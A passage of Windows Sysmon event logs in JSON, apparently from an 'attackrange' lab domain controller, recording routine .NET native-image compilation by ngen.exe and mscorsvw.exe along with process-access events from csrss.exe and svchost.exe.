08:05:17.882","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-223D-5F25-0000-00106DD00B00}","TargetProcessId":"3268","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:17","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7064,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:17.882\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-223D-5F25-0000-00106DD00B00}\r\nTargetProcessId: 3268\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:17.882","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-223D-5F25-0000-00106DD00B00}","TargetProcessId":"3268","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:17","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7065,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:17.882\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-223D-5F25-0000-00106DD00B00}\r\nTargetProcessId: 3268\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:17.882","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-223D-5F25-0000-00106DD00B00}","TargetProcessId":"3268","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:17","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7066,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:17.945\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-223D-5F25-0000-0010DAD30B00}\r\nTargetProcessId: 1592\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:17.945","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-223D-5F25-0000-0010DAD30B00}","TargetProcessId":"1592","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:17","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7067,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:17.945\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-223D-5F25-0000-0010DAD30B00}\r\nTargetProcessId: 1592\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:17.945","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-223D-5F25-0000-0010DAD30B00}","TargetProcessId":"1592","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:17","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7068,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:17.945\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-223D-5F25-0000-0010DAD30B00}\r\nTargetProcessId: 1592\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:17.945","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-223D-5F25-0000-0010DAD30B00}","TargetProcessId":"1592","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7069,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:05:18.523\r\nProcessGuid: {41C8662E-223D-5F25-0000-0010DAD30B00}\r\nProcessId: 1592\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\638-0\\Microsoft.Build.Utilities.v4.0.dll\r\nCreationUtcTime: 2020-08-01 08:05:18.507","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:05:18.523","ProcessGuid":"{41C8662E-223D-5F25-0000-0010DAD30B00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\638-0\\Microsoft.Build.Utilities.v4.0.dll","CreationUtcTime":"2020-08-01 08:05:18.507","EventReceivedTime":"2020-08-01 08:05:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7070,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:18.554\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-223E-5F25-0000-00106AD70B00}\r\nTargetProcessId: 3960\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:18.554","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-223E-5F25-0000-00106AD70B00}","TargetProcessId":"3960","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7071,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:18.554\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-223E-5F25-0000-00106AD70B00}\r\nTargetProcessId: 3960\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:18.554","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-223E-5F25-0000-00106AD70B00}","TargetProcessId":"3960","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:18","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7072,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:18.570\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-223E-5F25-0000-00106AD70B00}\r\nTargetProcessId: 3960\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 